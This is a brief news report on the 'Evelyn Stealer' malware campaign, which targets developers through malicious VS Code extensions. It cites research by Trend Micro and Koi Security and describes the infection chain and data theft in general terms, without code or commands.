Cybersecurity researchers have shared details of a malware campaign targeting software developers via the Microsoft Visual Studio Code (VS Code) extension ecosystem. The campaign delivers a new information-stealing malware dubbed ‘Evelyn Stealer,’ designed to harvest sensitive data by masquerading as legitimate VS Code extensions.
According to Trend Micro, the malware can exfiltrate developer credentials, browser data, cryptocurrency-related information, and turn compromised developer machines into potential entry points. The activity specifically targets organizations with software development teams that rely on VS Code and third-party extensions, particularly those with access to production systems, cloud environments, or digital assets.
The campaign was first documented last month by Koi Security, which identified three malicious VS Code extensions (BigBlack.bitcoin-black, BigBlack.codo-ai, and BigBlack.mrbigblacktheme) that dropped a malicious downloader DLL that launched hidden PowerShell commands to retrieve a second-stage payload.
The payload decrypts and injects the Evelyn Stealer malware directly into a legitimate Windows process in memory, helping it evade detection while collecting and exfiltrating data to a remote server. The malware also includes anti-analysis and anti-virtualization techniques and forcibly terminates browser processes to ensure uninterrupted access to cookies and stored credentials.